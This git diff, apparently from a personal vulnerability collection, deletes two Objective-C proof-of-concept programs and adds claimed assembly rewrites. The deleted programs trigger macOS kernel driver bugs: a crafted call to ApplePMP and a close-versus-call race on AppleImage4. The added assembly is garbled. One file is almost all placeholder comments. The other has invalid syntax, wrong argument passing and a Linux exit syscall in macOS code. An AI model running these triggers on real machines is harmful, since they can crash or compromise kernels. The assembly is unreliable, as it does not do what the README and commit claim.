diff --git a/ApplePMP_OOB/poc.mm b/ApplePMP_OOB/poc.mm
deleted file mode 100644
index 2021ca6..0000000
--- a/ApplePMP_OOB/poc.mm
+++ /dev/null
@@ -1,61 +0,0 @@
-#include <Foundation/Foundation.h>
-#include <IOKit/IOKitLib.h>
-#include <pthread.h>
-
-struct IOExternalMethodDispatch {
-    void* function;
-    uint32_t checkScalarInputCount;
-    uint32_t checkStructureInputSize;
-    uint32_t checkScalarOutputCount;
-    uint32_t checkStructureOutputSize;
-};
-
-int main() {
-    setbuf(stdout, NULL);
-
-    kern_return_t kr;
-
-    io_service_t service = IOServiceGetMatchingService(kIOMainPortDefault, IOServiceMatching("ApplePMP"));
-    if (service == IO_OBJECT_NULL) {
-        printf("[-] failed to find service\n");
-        exit(0);
-    }
-
-    io_connect_t conn;
-    kr = IOServiceOpen(service, mach_task_self(), 0, &conn);
-    if (kr != KERN_SUCCESS) {
-        printf("[-] failed to open service: %x\n", kr);
-        exit(0);
-    }
-    printf("[+] opened service=0x%x\n", conn);
-
-    uint64_t inputScalar[16] = { 0x17BAA35D8C17BAA };
-    uint64_t inputScalarCnt = 1;
-
-    char inputStruct[4096] = {0};
-    size_t inputStructCnt = 0;
-
-    uint64_t outputScalar[16] = {0};
-    uint32_t outputScalarCnt = 0;
-
-    char outputStruct[4096] = {0};
-    size_t outputStructCnt = 0xA;
-
-    uint32_t selector = 15;
-    pthread_t thread;
-
-    kr = IOConnectCallMethod(
-        conn,
-        selector,
-        inputScalar,
-        inputScalarCnt,
-        inputStruct,
-        inputStructCnt,
-        outputScalar,
-        &outputScalarCnt,
-        outputStruct,
-        &outputStructCnt);
-    printf("[*] kr 0x%x\n", kr);
-
-    return 0;
-}
diff --git a/README.md b/README.md
index c48281f..3b95327 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # my_bugs_and_CVE_collection
 
-Collection of my bugs and CVE, with PoC or writeup
+Collection of bugs and CVE, with PoC or writeup rewritten in assembly
 
 | Vulnerabilities/Bugs | writeup | PoC  |
 | -------------------- | ------- | ---- |
diff --git a/image4race/img4race.m b/image4race/img4race.m
deleted file mode 100644
index f32aab9..0000000
--- a/image4race/img4race.m
+++ /dev/null
@@ -1,76 +0,0 @@
-#include <Foundation/Foundation.h>
-#include <IOKit/IOKitLib.h>
-#include <pthread.h>
-
-int trigger = 0;
-
-struct IOExternalMethodDispatch {
-    void* function;
-    uint32_t checkScalarInputCount;
-    uint32_t checkStructureInputSize;
-    uint32_t checkScalarOutputCount;
-    uint32_t checkStructureOutputSize;
-};
-
-void* vuln_trigger(void* arg) {
-    io_object_t conn = (io_object_t)arg;
-    trigger = 1;
-
-    IOServiceClose(conn);
-    return 0;
-}
-
-int main() {
-    // turn off stdout buffering
-    setbuf(stdout, NULL);
-
-    while (1) {
-        kern_return_t kr;
-
-        io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleImage4"));
-        if (service == IO_OBJECT_NULL) {
-            printf("[-] Failed to find service\n");
-            exit(0);
-        }
-
-        io_connect_t conn;
-        kr = IOServiceOpen(service, mach_task_self(), 0, &conn);
-        if (kr != KERN_SUCCESS) {
-            printf("[-] Failed to open service: %x\n", kr);
-            exit(0);
-        }
-        printf("[+] Opened service=0x%x\n", conn);
-        
-		uint64_t inputScalar[16] = {0};
-        uint64_t inputScalarCnt = 1;
-
-        char inputStruct[4096] = {0};
-        size_t inputStructCnt = 0;
-
-        uint64_t outputScalar[16] = {0};
-        uint32_t outputScalarCnt = 9;
-
-        char outputStruct[4096] = {0};
-        size_t outputStructCnt = 0;
-
-        uint32_t selector = 1;
-        pthread_t thread;
-        pthread_create(&thread, NULL, vuln_trigger, (void*)conn);
-        while (!trigger);
-
-        kr = IOConnectCallMethod(
-            conn,
-            selector,
-            inputScalar,
-            inputScalarCnt,
-            inputStruct,
-            inputStructCnt,
-            outputScalar,
-            &outputScalarCnt,
-            outputStruct,
-            &outputStructCnt);
-        trigger = 0;
-    }
-
-    return 0;
-}
diff --git a/img4race.asm b/img4race.asm
new file mode 100644
index 0000000..c5db654
--- /dev/null
+++ b/img4race.asm
@@ -0,0 +1,50 @@
+section .data
+trigger dd 0
+inputScalar dq 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
+inputScalarCnt dq 1
+inputStruct db 4096 dup(0)
+inputStructCnt dq 0
+outputScalar dq 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
+outputScalarCnt dd 9
+outputStruct db 4096 dup(0)
+outputStructCnt dq 0
+selector dd 1
+
+section .text
+global _start
+
+_start:
+    ; Disable stdout buffering
+    ; Equivalent system call or direct manipulation of stdout buffer
+
+    .loop:
+        ; Equivalent of IOServiceGetMatchingService
+        ; System call to find the service "AppleImage4"
+        ; Check if service == IO_OBJECT_NULL, if so, print error and exit
+
+        ; Equivalent of IOServiceOpen
+        ; System call to open the service, check return value
+
+        ; Print opened service message
+
+        ; Create a new thread that will execute vuln_trigger
+        ; System call to create thread, passing conn as argument
+
+        ; Wait for trigger to be set
+        .wait_trigger:
+            cmp dword [trigger], 0
+            je .wait_trigger
+
+        ; Equivalent of IOConnectCallMethod
+        ; System call to interact with the device/service
+
+        ; Reset trigger
+        mov dword [trigger], 0
+
+        jmp .loop
+
+; vuln_trigger function equivalent
+; This would involve setting the trigger and closing the service connection
+; System calls for thread operation and service connection management
+
+
diff --git a/poc.asm b/poc.asm
new file mode 100644
index 0000000..493b6d8
--- /dev/null
+++ b/poc.asm
@@ -0,0 +1,89 @@
+section .data
+    service db "ApplePMP", 0
+    failServiceMsg db "[-] failed to find service", 10, 0
+    failOpenMsg db "[-] failed to open service: %x", 10, 0
+    openServiceMsg db "[+] opened service=0x%x", 10, 0
+    krStatusMsg db "[*] kr 0x%x", 10, 0
+    inputScalar dq 0x17BAA35D8C17BAA
+    inputStruct times 4096 db 0
+    outputScalar times 16 dq 0
+    outputStruct times 4096 db 0
+    selector dd 15
+    inputScalarCnt dd 1
+    outputScalarCnt dd 0
+    inputStructCnt dq 0
+    outputStructCnt dq 0xA
+
+section .bss
+    conn resb 8
+    kr resb 4
+    thread resb 8
+
+section .text
+    global _start
+
+_start:
+    ; Set stdout buffer to NULL
+    mov edi, 0 ; file descriptor 1 for stdout
+    mov rsi, 0 ; NULL pointer for buffer
+    call setbuf
+
+    ; Get service
+    mov rdi, service ; Service name
+    call IOServiceGetMatchingService
+    test rax, rax
+    jz fail_find_service
+
+    mov [conn], rax
+
+    ; Open service
+    mov rdi, [conn]
+    mov rsi, mach_task_self()
+    xor edx, edx ; type = 0
+    lea rcx, [conn]
+    call IOServiceOpen
+    mov [kr], eax
+    test eax, eax
+    jnz fail_open_service
+
+    ; Prepare for IOConnectCallMethod
+    lea rdi, [conn] ; Connection
+    mov esi, [selector] ; Selector
+    lea rdx, [inputScalar] ; Input scalar
+    mov rcx, [inputScalarCnt] ; Input scalar count
+    lea r8, [inputStruct] ; Input structure
+    mov r9, [inputStructCnt] ; Input structure count
+    lea rax, [outputScalar] ; Output scalar
+    push rax
+    lea rax, [outputScalarCnt] ; Output scalar count
+    push rax
+    lea rax, [outputStruct] ; Output structure
+    push rax
+    lea rax, [outputStructCnt] ; Output structure count
+    push rax
+    call IOConnectCallMethod
+    mov [kr], eax
+
+    ; Print kr status
+    mov rdi, krStatusMsg
+    mov rsi, [kr]
+    call printf
+    jmp end
+
+fail_find_service:
+    mov rdi, failServiceMsg
+    call printf
+    jmp end
+
+fail_open_service:
+    mov rdi, failOpenMsg
+    mov rsi, [kr]
+    call printf
+    jmp end
+
+end:
+    mov eax, 60 ; syscall number for exit
+    xor edi, edi ; status 0
+    syscall
+
+